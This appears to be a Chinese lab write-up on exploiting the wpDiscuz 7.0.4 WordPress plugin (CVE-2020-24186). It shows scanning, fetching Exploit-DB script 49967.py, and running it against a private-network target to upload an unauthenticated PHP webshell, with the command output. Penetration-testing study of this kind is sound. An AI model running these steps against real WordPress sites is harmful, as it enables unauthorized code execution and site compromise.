【wordpress-wpdiscuz-rce】

java 复制代码
┌──(root㉿kali)-[~]
└─# wpscan --url http://192.168.142.131:83/ --plugins-detection aggressive
┌──(root㉿kali)-[~]
└─# searchsploit wpdiscuz
-------------------------------------------------------------- ---------------------------------
 Exploit Title                                                |  Path
-------------------------------------------------------------- ---------------------------------
Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unau | php/webapps/49962.sh
WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unau | php/webapps/49967.py
Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary F | php/webapps/49401.rb
-------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

已知漏洞:

  1. 任意文件上传 (49962.sh)

  2. 远程代码执行 (49967.py)

  3. 未授权任意文件上传 (49401.rb)

这些漏洞都是针对 wpDiscuz 7.0.4 版本的。

将指定的 exploit 文件复制到当前工作目录:

┌──(root㉿kali)-[~]

└─# searchsploit -m 49967

Exploit: WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)

URL: https://www.exploit-db.com/exploits/49967

Path: /usr/share/exploitdb/exploits/php/webapps/49967.py

Codes: CVE-2020-24186

Verified: False

File Type: Python script, Unicode text, UTF-8 text executable, with very long lines (864)

Copied to: /root/49967.py

┌──(root㉿kali)-[~]

└─# python3 49967.py

+\] Specify an url target \[+\] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost \[+\] Example help usage: exploit.py -h 所以我们找日志路径 ![](https://i-blog.csdnimg.cn/direct/ae7b20264e2f4285849f20a7d38ef97d.png)

python3 49967.py -u http://192.168.142.131:83 -p /2025/04/22/hello-world/

  • python3 49967.py:运行 Python exploit 脚本

  • -u http://192.168.142.131:83:指定目标 WordPress 站点的 URL

  • -p /2025/04/22/hello-world/:指定包含 wpDiscuz 评论插件的文章路径

java 复制代码
┌──(root㉿kali)-[~]
└─# python3 49967.py -u http://192.168.142.131:83 -p /2025/04/22/hello-world/
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
--------------------------------------------------------------- 

[+] Response length:[105102] | code:[200]
[!] Got wmuSecurity value: 501d0d4c77
[!] Got wmuSecurity value: 1 

[+] Generating random name for Webshell...
[!] Generated webshell name: fbmthofztipssba

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url":"http://192.168.142.131:83/wp-content/uploads/2026/01/fbmthofztipssba-1769068648.6248.php" 

这里回显成功上传webshell,访问这个路径可以看到数据

拼接cmd可以发现没有登录的情况下也能查看id等数据

相关推荐
05大叔15 小时前
网络基础知识 域名,JSON格式,AI基础
运维·服务器·网络
我想走路带风15 小时前
c++工具转向网络底层工具
网络
dashizhi201515 小时前
服务器共享禁止保存到本地磁盘、共享文件禁止另存为本地磁盘、移动硬盘等
运维·网络·stm32·安全·电脑
皙然15 小时前
深入理解TCP流量控制
网络·网络协议·tcp/ip
网教盟人才服务平台16 小时前
2026数字中国创新大赛-数字安全赛道全面启动!
网络·安全
woho77889916 小时前
不同网段IP的网络打印机,打印、扫描设置
运维·服务器·网络
CN.LG16 小时前
抓包工具 Wireshark 是什么?
网络·测试工具·wireshark
兄弟加油,别颓废了。17 小时前
BUUCTF——Basic——BUU LFI COURSE 11
安全·web安全
Crazyong17 小时前
FreeRTOS-任务通知-1
网络
JdayStudy18 小时前
SIR 网络传播仿真软件说明书
开发语言·网络·php